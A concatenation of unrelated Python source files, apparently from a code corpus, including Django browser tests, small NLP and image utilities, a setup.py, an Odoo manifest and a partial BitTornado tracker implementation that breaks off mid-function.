[0.1, 10.0, 35.0]])
P = 0.0001 * np.array([[3689, 1170, 2673],
[4699, 4387, 7470],
[1090, 8732, 5547],
[381, 5743, 8828]])
external_sum = 0
for i in range(4):
internal_sum = 0
for j in range(3):
internal_sum += A[i, j] * (x[j] - P[i, j]) ** 2
external_sum += alpha[i] * np.exp(-internal_sum)
return external_sum
|
import os
import subprocess
from sys import stdout, stderr
from channels.testing import ChannelsLiveServerTestCase
from django.conf import settings
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.cache import cache
from splinter import Browser
from django.urls import reverse
from programdom.models import Workshop
from tests.generators.user import AuthUserFactory
HEADLESS = settings.HEADLESS
class AuthedSplinterTestCase(ChannelsLiveServerTestCase):
def setUp(self):
self.browser = Browser('chrome', headless=True)
user = AuthUserFactory()
self.browser.visit(f'{self.live_server_url}{reverse("users:login")}')
self.browser.fill('username', user.username)
self.browser.fill('password', "password")
self.browser.find_by_text("Login")[0].click()
def tearDown(self):
self.browser.quit()
class StudentSplinterTestCase(ChannelsLiveServerTestCase):
fixtures = ['workshops', "languages", "problems", "problem_tests"]
def setUp(self):
self.browser = Browser('chrome', headless=True)
self.browser.visit(f'{self.live_server_url}{reverse("workshop_auth")}')
self.workshop = Workshop.objects.get(pk=1)
self.workshop.start()
self.browser.fill('code', self.workshop.code)
self.browser.click_link_by_id("submit-id-submit")
def tearDown(self):
self.browser.quit()
class WithBridgeTestCase(AuthedSplinterTestCase):
bridge_process = None
def setUp(self):
cache.clear()
super().setUp()
@classmethod
def setUpClass(cls):
super().setUpClass()
env = os.environ.copy()
env["DATABASE_URL"] = "postgresql://postgres@localhost:5432/" + settings.DATABASES['default']['NAME']
cls.bridge_process = subprocess.Popen(["python", "manage.py", "runworker", "judgebridge"], env=env)
cls.bridge_process.stdout = stdout
cls.bridge_process.stderr = stderr
@classmethod
def tearDownClass(cls):
cls.bridge_process.terminate()
super().tearDownClass()
|
from dataclasses import dataclass
from collections import Counter
from pathlib import Path
from typing import List
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import RegexpTokenizer
tokenizer = RegexpTokenizer(r"\w+")
stop_words_en = set(stopwords.words("english"))
wordnet_lemmatizer = WordNetLemmatizer()
@dataclass
class WordAnalysis:
word_count: int
unique_word_count: int
top_words: List[str]
def word_count(filepath: Path):
"""
Perform a naive word count analysis on given text
Improvements:
- use lemms for unique_word_count
- use stopwords to eliminate common words from top_words
"""
content = filepath.read_text("utf-8")
word_tokens = tokenizer.tokenize(content)
lemms = [wordnet_lemmatizer.lemmatize(word) for word in word_tokens]
counter = Counter([lem for lem in lemms if lem.lower() not in stop_words_en])
top_words = list([word for word, _count in counter.most_common(10)])
return WordAnalysis(
word_count=len(word_tokens),
unique_word_count=len(counter),
top_words=top_words,
)
|
import random
import string
from django.utils.text import slugify
def get_random_string(size=4, chars=string.ascii_lowercase + string.digits):
return "".join([random.choice(chars) for _ in range(size)])
def get_unique_slug(instance, new_slug=None, size=10, max_size=30):
title = instance.title
if new_slug is None:
"""
Default
"""
slug = slugify(title)
else:
"""
Recursive
"""
slug = new_slug
slug = slug[:max_size]
Klass = instance.__class__ # Playlist, Category
parent = None
try:
parent = instance.parent
except:
pass
if parent is not None:
qs = Klass.objects.filter(parent=parent, slug=slug) # smaller
else:
qs = Klass.objects.filter(slug=slug) # larger
if qs.exists():
new_slug = slugify(title) + get_random_string(size=size)
return get_unique_slug(instance, new_slug=new_slug)
return slug |
import numpy as np
import nose
import nibabel as nib
from nose.tools import assert_true, assert_false, assert_equal, assert_almost_equal
from numpy.testing import assert_array_equal, assert_array_almost_equal
from dipy.sims.voxel import SingleTensor, multi_tensor_odf, all_tensor_evecs
from dipy.core.geometry import vec2vec_rotmat
from dipy.data import get_data, get_sphere
from dipy.viz import fvtk
def diff2eigenvectors(dx,dy,dz):
""" numerical derivatives 2 eigenvectors
"""
u=np.array([dx,dy,dz])
u=u/np.linalg.norm(u)
R=vec2vec_rotmat(basis[:,0],u)
eig0=u
eig1=np.dot(R,basis[:,1])
eig2=np.dot(R,basis[:,2])
eigs=np.zeros((3,3))
eigs[:,0]=eig0
eigs[:,1]=eig1
eigs[:,2]=eig2
return eigs, R
def test_single_tensor():
fimg,fbvals,fbvecs=get_data('small_64D')
bvals=np.load(fbvals)
bvecs=np.load(fbvecs)
#bvals=np.loadtxt(fbvals)
#bvecs=np.loadtxt(fbvecs).T
img=nib.load(fimg)
data=img.get_data()
evals=np.array([1.4,.35,.35])*10**(-3)
evecs=np.eye(3)
S=SingleTensor(bvals,bvecs,100,evals,evecs,snr=None)
"""
colours=fvtk.colors(S,'jet')
r=fvtk.ren()
fvtk.add(r,fvtk.point(bvecs,colours))
fvtk.show(r)
"""
def test_multi_tensor():
vertices, faces = get_sphere('symmetric724')
mevals=np.array(([0.0015, 0.0003, 0.0003],
[0.0015, 0.0003, 0.0003]))
e0 = np.array([1, 0, 0.])
e1 = np.array([0., 1, 0])
mevecs=[all_tensor_evecs(e0), all_tensor_evecs(e1)]
odf = multi_tensor_odf(vertices, [0.5,0.5], mevals, mevecs)
assert odf.shape == (len(vertices),)
assert np.all(odf <= 1) & np.all(odf >= 0)
if __name__ == "__main__":
test_single_tensor()
|
"""
Musicbrainz related functions.
"""
import musicbrainzngs as mus
#from __init__ import __version__
from .__init__ import __version__
def init():
"""Initialize musicbrainz."""
mus.set_useragent("python-bum: A cover art daemon.",
__version__,
"https://github.com/dylanaraps/bum")
def get_cover(song, size=250):
"""Download the cover art."""
try:
data = mus.search_releases(artist=song["artist"],
release=song["album"],
limit=1)
release_id = data["release-list"][0]["release-group"]["id"]
print(f"album: Using release-id: {data['release-list'][0]['id']}")
return mus.get_release_group_image_front(release_id, size=size)
except mus.NetworkError:
get_cover(song, size)
except mus.ResponseError:
print("error: Couldn't find album art for",
f"{song['artist']} - {song['album']}")
|
import numpy
import math
import random
spawn_position = 0
def spawner_function(x):
y = 4 * (x ^ 2) + 1
return y
def spawner_function_invrt(y):
x = math.sqrt(abs((y - 1)/4))
return x
def spawner(current_position):
y = random.random() * 400
x = spawner_function_invrt(y)
spawn_position = int(x)
return spawn_position
print(spawner(10))
|
import math
import chainer
def to_tuple(cand):
if isinstance(cand, tuple):
return cand
else:
return cand, cand
def factor(shape, ksize, stride, pad):
ksize = to_tuple(ksize)
stride = to_tuple(stride)
pad = to_tuple(pad)
l = math.ceil(min(ksize[0], shape[2] + pad[0] * 2 - ksize[0] + 1) / stride[0])
l *= math.ceil(min(ksize[1], shape[3] + pad[1] * 2 - ksize[1] + 1) / stride[1])
return math.sqrt(l)
def max_pooling_2d(x, ksize, stride, pad=0, cover_all=True):
x, t, l = x
l *= factor(x.shape, ksize, stride, pad)
x = chainer.functions.max_pooling_2d(
x, ksize=ksize, stride=stride, pad=pad, cover_all=cover_all)
return x, t, l
def average_pooling_2d(x, ksize, stride, pad=0):
x, t, l = x
l *= factor(x.shape, ksize, stride, pad)
ksize = to_tuple(ksize)
l /= math.sqrt(ksize[0] * ksize[1])
x = chainer.functions.average_pooling_2d(
x, ksize=ksize, stride=stride, pad=pad)
return x, t, l
|
"""Boto3 S3 image file stream into memory to show via matplotlib without writing.
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import io
import boto3
access_key = ''
accrss_secret = ''
bucket_name = ''
region_name = ''
client_s3 = boto3.resource(
's3',
aws_access_key_id=access_key,
aws_secret_access_key=accrss_secret,
region_name=region_name
)
bucket = client_s3.Bucket(bucket_name)
img_object = bucket.Object('fox/fox-wild-22.jpg')
file_stream = io.BytesIO()
img_object.download_fileobj(file_stream)
img = mpimg.imread(file_stream, format='jpeg')
plt.imshow(img)
plt.show()
|
from setuptools import setup, find_packages
setup(
name='rigidsearch',
version='1.0.dev0',
url='http://github.com/getsentry/rigidsearch',
description='A simple web search API.',
license='BSD',
author='Sentry',
author_email='hello@getsentry.com',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'click>=6.0',
'Flask',
'whoosh',
'html5lib<=0.9999999',
'lxml',
'cssselect',
'raven',
'blinker',
],
extras_require={
'server': ['gunicorn', 'gevent'],
'test': ['pytest'],
},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
entry_points='''
[console_scripts]
rigidsearch=rigidsearch.cli:main
'''
)
|
import logging
def setup_logging(output_folder, out_file='log.txt'):
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s - [%(name)s]: %(message)s',
datefmt='%y-%m-%d %H:%M',
filename='{}/{}'.format(output_folder, out_file),
filemode='w'
)
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('[%(name)s]: %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
def log_to_file(name, value):
logger = logging.getLogger(name)
logger.info(value)
if __name__ == '__main__':
pass |
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Authentication via LDAP',
'depends': ['base', 'base_setup'],
#'description': < auto-loaded from README file
'category': 'Hidden/Tools',
'data': [
'views/ldap_installer_views.xml',
'security/ir.model.access.csv',
'views/res_config_settings_views.xml',
],
'external_dependencies': {
'python': ['ldap'],
}
}
|
from compute_PSNR_UP import cal_pnsr, cal_pnsr_all
import imageio
#img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x2/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass003_0.00001/EstimatedTextures/Texture006.png')
#img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x4/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass001_0.00100/EstimatedTextures/Texture017.png')
img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x4/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass003_0.00001/EstimatedTextures/Texture067.png')
img_hr=imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x1/WeightedBilaplacian_TV_Blender/Pass001_0.00100/EstimatedTextures/Texture000.png')
psnr_y, psnr = cal_pnsr_all(img_hr, img_sr)
print(psnr)
|
# -*- coding: utf-8 -*-
"""This package contains each component."""
|
# Written by Bram Cohen
# see LICENSE.txt for license information
from herd.BitTornado.parseargs import parseargs, formatDefinitions
from herd.BitTornado.RawServer import RawServer, autodetect_ipv6, autodetect_socket_style
from herd.BitTornado.HTTPHandler import HTTPHandler, months, weekdays
from herd.BitTornado.parsedir import parsedir
from NatCheck import NatCheck
from T2T import T2TList
from herd.BitTornado.subnetparse import IP_List, ipv6_to_ipv4, to_ipv4, is_valid_ip, is_ipv4
from herd.BitTornado.iprangeparse import IP_List as IP_Range_List
from herd.BitTornado.torrentlistparse import parsetorrentlist
from threading import Event, Thread
from herd.BitTornado.bencode import bencode, bdecode, Bencached
from herd.BitTornado.zurllib import urlopen, quote, unquote
from Filter import Filter
from urlparse import urlparse
from os import rename, getpid
from os.path import exists, isfile
from cStringIO import StringIO
from traceback import print_exc
from time import time, gmtime, strftime, localtime
from herd.BitTornado.clock import clock
from random import shuffle, seed, randrange
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from types import StringType, IntType, LongType, ListType, DictType
from binascii import b2a_hex, a2b_hex, a2b_base64
from string import lower
import sys, os
import signal
import re
import herd.BitTornado.__init__
from herd.BitTornado.__init__ import version, createPeerID
try:
True
except:
True = 1
False = 0
defaults = [
('port', 8998, "Port to listen on."),
('dfile', None, 'file to store recent downloader info in'),
('bind', '', 'comma-separated list of ips/hostnames to bind to locally'),
# ('ipv6_enabled', autodetect_ipv6(),
('ipv6_enabled', 0,
'allow the client to connect to peers via IPv6'),
('ipv6_binds_v4', autodetect_socket_style(),
'set if an IPv6 server socket will also field IPv4 connections'),
('socket_timeout', 15, 'timeout for closing connections'),
('save_dfile_interval', 5 * 60, 'seconds between saving dfile'),
('timeout_downloaders_interval', 2 * 60, 'seconds between expiring downloaders'),
('reannounce_interval', 15, 'seconds downloaders should wait between reannouncements'),
('response_size', 500, 'number of peers to send in an info message'),
('timeout_check_interval', 5,
'time to wait between checking if any connections have timed out'),
('nat_check', 0,
"how many times to check if a downloader is behind a NAT (0 = don't check)"),
('log_nat_checks', 0,
"whether to add entries to the log for nat-check results"),
('min_time_between_log_flushes', 3.0,
'minimum time it must have been since the last flush to do another one'),
('min_time_between_cache_refreshes', 600.0,
'minimum time in seconds before a cache is considered stale and is flushed'),
('allowed_dir', '', 'only allow downloads for .torrents in this dir'),
('allowed_list', '', 'only allow downloads for hashes in this list (hex format, one per line)'),
('allowed_controls', 0, 'allow special keys in torrents in the allowed_dir to affect tracker access'),
('multitracker_enabled', 0, 'whether to enable multitracker operation'),
('multitracker_allowed', 'autodetect', 'whether to allow incoming tracker announces (can be none, autodetect or all)'),
('multitracker_reannounce_interval', 2 * 60, 'seconds between outgoing tracker announces'),
('multitracker_maxpeers', 20, 'number of peers to get in a tracker announce'),
('aggregate_forward', '', 'format: <url>[,<password>] - if set, forwards all non-multitracker to this url with this optional password'),
('aggregator', '0', 'whether to act as a data aggregator rather than a tracker. If enabled, may be 1, or <password>; ' +
'if password is set, then an incoming password is required for access'),
('hupmonitor', 0, 'whether to reopen the log file upon receipt of HUP signal'),
('http_timeout', 60,
'number of seconds to wait before assuming that an http connection has timed out'),
('parse_dir_interval', 60, 'seconds between reloading of allowed_dir or allowed_file ' +
'and allowed_ips and banned_ips lists'),
('show_infopage', 1, "whether to display an info page when the tracker's root dir is loaded"),
('infopage_redirect', '', 'a URL to redirect the info page to'),
('show_names', 1, 'whether to display names from allowed dir'),
('favicon', '', 'file containing x-icon data to return when browser requests favicon.ico'),
('allowed_ips', '', 'only allow connections from IPs specified in the given file; '+
'file contains subnet data in the format: aa.bb.cc.dd/len'),
('banned_ips', '', "don't allow connections from IPs specified in the given file; "+
'file contains IP range data in the format: xxx:xxx:ip1-ip2'),
('only_local_override_ip', 2, "ignore the ip GET parameter from machines which aren't on local network IPs " +
"(0 = never, 1 = always, 2 = ignore if NAT checking is not enabled)"),
('logfile', '', 'file to write the tracker logs, use - for stdout (default)'),
('allow_get', 0, 'use with allowed_dir; adds a /file?hash={hash} url that allows users to download the torrent file'),
('keep_dead', 0, 'keep dead torrents after they expire (so they still show up on your /scrape and web page)'),
('scrape_allowed', 'full', 'scrape access allowed (can be none, specific or full)'),
('dedicated_seed_id', '', 'allows tracker to monitor dedicated seed(s) and flag torrents as seeded'),
]
def statefiletemplate(x):
if type(x) != DictType:
raise ValueError
for cname, cinfo in x.items():
if cname == 'peers':
for y in cinfo.values(): # The 'peers' key is a dictionary of SHA hashes (torrent ids)
if type(y) != DictType: # ... for the active torrents, and each is a dictionary
raise ValueError
for id, info in y.items(): # ... of client ids interested in that torrent
if (len(id) != 20):
raise ValueError
if type(info) != DictType: # ... each of which is also a dictionary
raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent
if type(info.get('ip', '')) != StringType:
raise ValueError
port = info.get('port')
if type(port) not in (IntType,LongType) or port < 0:
raise ValueError
left = info.get('left')
if type(left) not in (IntType,LongType) or left < 0:
raise ValueError
elif cname == 'completed':
if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids)
raise ValueError # ... for keeping track of the total completions per torrent
for y in cinfo.values(): # ... each torrent has an integer value
if type(y) not in (IntType,LongType):
raise ValueError # ... for the number of reported completions for that torrent
elif cname == 'allowed':
if (type(cinfo) != DictType): # a list of info_hashes and included data
raise ValueError
if x.has_key('allowed_dir_files'):
adlist = [z[1] for z in x['allowed_dir_files'].values()]
for y in cinfo.keys(): # and each should have a corresponding key here
if not y in adlist:
raise ValueError
elif cname == 'allowed_dir_files':
if (type(cinfo) != DictType): # a list of files, their attributes and info hashes
raise ValueError
dirkeys = {}
for y in cinfo.values(): # each entry should have a corresponding info_hash
if not y[1]:
continue
if not x['allowed'].has_key(y[1]):
raise ValueError
if dirkeys.has_key(y[1]): # and each should have a unique info_hash
raise ValueError
dirkeys[y[1]] = 1
alas = 'your file may exist elsewhere in the universe\nbut alas, not here\n'
local_IPs = IP_List()
local_IPs.set_intranet_addresses()
def isotime(secs = None):
if secs == None:
secs = time()
return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs))
http_via_filter = re.compile(' for ([0-9.]+)\Z')
def _get_forwarded_ip(headers):
header = headers.get('x-forwarded-for')
if header:
try:
x,y = header.split(',')
except:
return header
if is_valid_ip(x) and not local_IPs.includes(x):
return x
return y
header = headers.get('client-ip')
if header:
return header
header = headers.get('via')
if header:
x = http_via_filter.search(header)
try:
return x.group(1)
except:
pass
header = headers.get('from')
#if header:
# return header
#return None
return header
def get_forwarded_ip(headers):
x = _get_forwarded_ip(headers)
if not is_valid_ip(x) or local_IPs.includes(x):
return None
return x
def compact_peer_info(ip, port):
try:
s = ( ''.join([chr(int(i)) for i in ip.split('.')])
+ chr((port & 0xFF00) >> 8) + chr(port & 0xFF) )
if len(s) != 6:
raise ValueError
except:
s = '' # not a valid IP, must be a domain name
return s
class Tracker:
def __init__(self, config, rawserver):
self.config = config
self.response_size = config['response_size']
self.dfile = config['dfile']
self.natcheck = config['nat_check']
favicon = config['favicon']
self.parse_dir_interval = config['parse_dir_interval']
self.favicon = None
if favicon:
try:
h = open(favicon,'r')
self.favicon = h.read()
h.close()
except:
print "**warning** specified favicon file -- %s -- does not exist." % favicon
self.rawserver = rawserver
self.cached = {} # format: infohash: [[time1, l1, s1], [time2, l2, s2], [time3, l3, s3]]
self.cached_t = {} # format: infohash: [time, cache]
self.times = {}
self.state = {}
self.seedcount = {}
self.allowed_IPs = None
self.banned_IPs = None
if config['allowed_ips'] or config['banned_ips']:
self.allowed_ip_mtime = 0
self.banned_ip_mtime = 0
self.read_ip_lists()
self.only_local_override_ip = config['only_local_override_ip']
if self.only_local_override_ip == 2:
self.only_local_override_ip = not config['nat_check']
if exists(self.dfile):
try:
h = open(self.dfile, 'rb')
ds = h.read()
h.close()
tempstate = bdecode(ds)
if not tempstate.has_key('peers'):
tempstate = {'peers': tempstate}
statefiletemplate(tempstate)
self.state = tempstate
except:
print '**warning** statefile '+self.dfile+' corrupt; resetting'
self.downloads = self.state.setdefault('peers', {})
self.completed = self.state.setdefault('completed', {})
self.becache = {} # format: infohash: [[l1, s1], [l2, s2], [l3, s3]]
for infohash, ds in self.downloads.items():
self.seedcount[infohash] = 0
for x,y in ds.items():
ip = y['ip']
if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip))
or (self.banned_IPs and self.banned_IPs.includes(ip)) ):
del ds[x]
continue
if not y['left']:
self.seedcount[infohash] += 1
if y.get('nat',-1):
continue
gip = y.get('given_ip')
if is_valid_ip(gip) and (
not self.only_local_override_ip or local_IPs.includes(ip) ):
ip = gip
self.natcheckOK(infohash,x,ip,y['port'],y['left'])
for x in self.downloads.keys():
self.times[x] = {}
for y in self.downloads[x].keys():
self.times[x][y] = 0
self.trackerid = createPeerID('-T-')
seed(self.trackerid)
self.reannounce_interval = config['reannounce_interval']
self.save_dfile_interval = config['save_dfile_interval']
self.show_names = config['show_names']
rawserver.add_task(self.save_state, self.save_dfile_interval)
self.prevtime = clock()
self.timeout_downloaders_interval = config['timeout_downloaders_interval']
rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
self.logfile = None
self.log = None
if (config['logfile']) and (config['logfile'] != '-'):
try:
self.logfile = config['logfile']
self.log = open(self.logfile,'a')
sys.stdout = self.log
print "# Log Started: ", isotime()
except:
print "**warning** could not redirect stdout to log file: ", sys.exc_info()[0]
if config['hupmonitor']:
def huphandler(signum, frame, self = self):
try:
self.log.close ()
self.log = open(self.logfile,'a')
sys.stdout = self.log
print "# Log reopened: ", isotime()
except:
print "**warning** could not reopen logfile"
signal.signal(signal.SIGHUP, huphandler)
self.allow_get = config['allow_get']
self.t2tlist = T2TList(config['multitracker_enabled'], self.trackerid,
config['multitracker_reannounce_interval'],
config['multitracker_maxpeers'], config['http_timeout'],
self.rawserver)
if config['allowed_list']:
if config['allowed_dir']:
print '**warning** allowed_dir and allowed_list options cannot be used together'
print '**warning** disregarding allowed_dir'
config['allowed_dir'] = ''
self.allowed = self.state.setdefault('allowed_list',{})
self.allowed_list_mtime = 0
self.parse_allowed()
self.remove_from_state('allowed','allowed_dir_files')
if config['multitracker_allowed'] == 'autodetect':
config['multitracker_allowed'] = 'none'
config['allowed_controls'] = 0
elif config['allowed_dir']:
self.allowed = self.state.setdefault('allowed',{})
self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{})
self.allowed_dir_blocked = {}
self.parse_allowed()
self.remove_from_state('allowed_list')
else:
self.allowed = None
self.remove_from_state('allowed','allowed_dir_files', 'allowed_list')
if config['multitracker_allowed'] == 'autodetect':
config['multitracker_allowed'] = 'none'
config['allowed_controls'] = 0
self.uq_broken = unquote('+') != ' '
self.keep_dead = config['keep_dead']
self.Filter = Filter(rawserver.add_task)
aggregator = config['aggregator']
if aggregator == '0':
self.is_aggregator = False
self.aggregator_key = None
else:
self.is_aggregator = True
if aggregator == '1':
self.aggregator_key = None
else:
self.aggregator_key = aggregator
self.natcheck = False
send = config['aggregate_forward']
if not send:
self.aggregate_forward = None
else:
try:
self.aggregate_forward, self.aggregate_password = send.split(',')
except:
self.aggregate_forward = send
self.aggregate_password = None
self.dedicated_seed_id = config['dedicated_seed_id']
self.is_seeded = {}
self.cachetime = 0
self.cachetimeupdate()
def cachetimeupdate(self):
self.cachetime += 1 # raw clock, but more efficient for cache
self.rawserver.add_task(self.cachetimeupdate,1)
def aggregate_senddata(self, query):
url = self.aggregate_forward+'?'+query
if self.aggregate_password is not None:
url += '&password='+self.aggregate_password
rq = Thread(target = self._aggregate_senddata, args = [url])
rq.setDaemon(False)
rq.start()
def _aggregate_senddata(self, url): # just send, don't attempt to error check,
try: # discard any returned data
h = urlopen(url)
h.read()
h.close()
except:
return
def get_infopage(self):
try:
if not self.config['show_infopage']:
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
red = self.config['infopage_redirect']
if red:
return (302, 'Found', {'Content-Type': 'text/html', 'Location': red},
'<A HREF="'+red+'">Click Here</A>')
s = StringIO()
s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \
'<html><head><title>BitTorrent download info</title>\n')
if self.favicon is not None:
s.write('<link rel="shortcut icon" href="/favicon.ico">\n')
s.write('</head>\n<body>\n' \
'<h3>BitTorrent download info</h3>\n'\
'<ul>\n'
'<li><strong>tracker version:</strong> %s</li>\n' \
'<li><strong>server time:</strong> %s</li>\n' \
'</ul>\n' % (version, isotime()))
if self.config['allowed_dir']:
if self.show_names:
names = [ (self.allowed[hash]['name'],hash)
for hash in self.allowed.keys() ]
else:
names = [ (None,hash)
for hash in self.allowed.keys() ]
else:
names = [ (None,hash) for hash in self.downloads.keys() ]
if not names:
s.write('<p>not tracking any files yet...</p>\n')
else:
names.sort()
tn = 0
tc = 0
td = 0
tt = 0 # Total transferred
ts = 0 # Total size
nf = 0 # Number of files displayed
if self.config['allowed_dir'] and self.show_names:
s.write('<table summary="files" border="1">\n' \
'<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th align="right">transferred</th></tr>\n')
else:
s.write('<table summary="files">\n' \
'<tr><th>info hash</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n')
for name,hash in names:
l = self.downloads[hash]
n = self.completed.get(hash, 0)
tn = tn + n
c = self.seedcount[hash]
tc = tc + c
d = len(l) - c
td = td + d
if self.config['allowed_dir'] and self.show_names:
if self.allowed.has_key(hash):
nf = nf + 1
sz = self.allowed[hash]['length'] # size
ts = ts + sz
szt = sz * n # Transferred for this torrent
tt = tt + szt
if self.allow_get == 1:
linkname = '<a href="/file?info_hash=' + quote(hash) + '">' + name + '</a>'
else:
linkname = name
s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \
% (b2a_hex(hash), linkname, size_format(sz), c, d, n, size_format(szt)))
else:
s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \
% (b2a_hex(hash), c, d, n))
ttn = 0
for i in self.completed.values():
ttn = ttn + i
if self.config['allowed_dir'] and self.show_names:
s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td><td align="right">%s</td></tr>\n'
% (nf, size_format(ts), tc, td, tn, ttn, size_format(tt)))
else:
s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td></tr>\n'
% (nf, tc, td, tn, ttn))
s.write('</table>\n' \
'<ul>\n' \
'<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \
'<li><em>complete:</em> number of connected clients with the complete file</li>\n' \
'<li><em>downloading:</em> number of connected clients still downloading</li>\n' \
'<li><em>downloaded:</em> reported complete downloads (total: current/all)</li>\n' \
'<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \
'</ul>\n')
s.write('</body>\n' \
'</html>\n')
return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue())
except:
print_exc()
return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error')
def scrapedata(self, hash, return_name = True):
l = self.downloads[hash]
n = self.completed.get(hash, 0)
c = self.seedcount[hash]
d = len(l) - c
f = {'complete': c, 'incomplete': d, 'downloaded': n}
if return_name and self.show_names and self.config['allowed_dir']:
f['name'] = self.allowed[hash]['name']
return (f)
def get_scrape(self, paramslist):
fs = {}
if paramslist.has_key('info_hash'):
if self.config['scrape_allowed'] not in ['specific', 'full']:
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'specific scrape function is not available with this tracker.'}))
for hash in paramslist['info_hash']:
if self.allowed is not None:
if self.allowed.has_key(hash):
fs[hash] = self.scrapedata(hash)
else:
if self.downloads.has_key(hash):
fs[hash] = self.scrapedata(hash)
else:
if self.config['scrape_allowed'] != 'full':
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'full scrape function is not available with this tracker.'}))
if self.allowed is not None:
keys = self.allowed.keys()
else:
keys = self.downloads.keys()
for hash in keys:
fs[hash] = self.scrapedata(hash)
return (200, 'OK', {'Content-Type': 'text/plain'}, bencode({'files': fs}))
def get_file(self, hash):
if not self.allow_get:
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
'get function is not available with this tracker.')
if not self.allowed.has_key(hash):
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
fname = self.allowed[hash]['file']
fpath = self.allowed[hash]['path']
return (200, 'OK', {'Content-Type': 'application/x-bittorrent',
'Content-Disposition': 'attachment; filename=' + fname},
open(fpath, 'rb').read())
def check_allowed(self, infohash, paramslist):
if ( self.aggregator_key is not None
and not ( paramslist.has_key('password')
and paramslist['password'][0] == self.aggregator_key ) ):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'Requested download is not authorized for use with this tracker.'}))
if self.allowed is not None:
if not self.allowed.has_key(infohash):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'Requested download is not authorized for use with this tracker.'}))
if self.config['allowed_controls']:
if self.allowed[infohash].has_key('failure reason'):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason': self.allowed[infohash]['failure reason']}))
if paramslist.has_key('tracker'):
if ( self.config['multitracker_allowed'] == 'none' or # turned off
paramslist['peer_id'][0] == self.trackerid ): # oops! contacted myself
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason': 'disallowed'}))
if ( self.config['multitracker_allowed'] == 'autodetect'
and not self.allowed[infohash].has_key('announce-list') ):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'Requested download is not authorized for multitracker use.'}))
return None
def add_data(self, infohash, event, ip, paramslist):
peers = self.downloads.setdefault(infohash, {})
ts = self.times.setdefault(infohash, {})
self.completed.setdefault(infohash, 0)
self.seedcount.setdefault(infohash, 0)
def params(key, default = None, l = paramslist):
if l.has_key(key):
return l[key][0]
return default
myid = params('peer_id','')
if len(myid) != 20:
raise ValueError, 'id not of length 20'
if event not in ['started', 'completed', 'stopped', 'snooped', None]:
raise ValueError, 'invalid event'
port = long(params('port',''))
if port < 0 or port > 65535:
raise ValueError, 'invalid port'
left = long(params('left',''))
if left < 0:
raise ValueError, 'invalid amount left'
uploaded = long(params('uploaded',''))
downloaded = long(params('downloaded',''))
peer = peers.get(myid)
islocal = local_IPs.includes(ip)
mykey = params('key')
if peer:
auth = peer.get('key',-1) == mykey or peer.get('ip') == ip
gip = params('ip')
if is_valid_ip(gip) and (islocal or not self.only_local_override_ip):
ip1 = gip
else:
ip1 = ip
if params('numwant') is not None:
rsize = min(int(params('numwant')),self.response_size)
else:
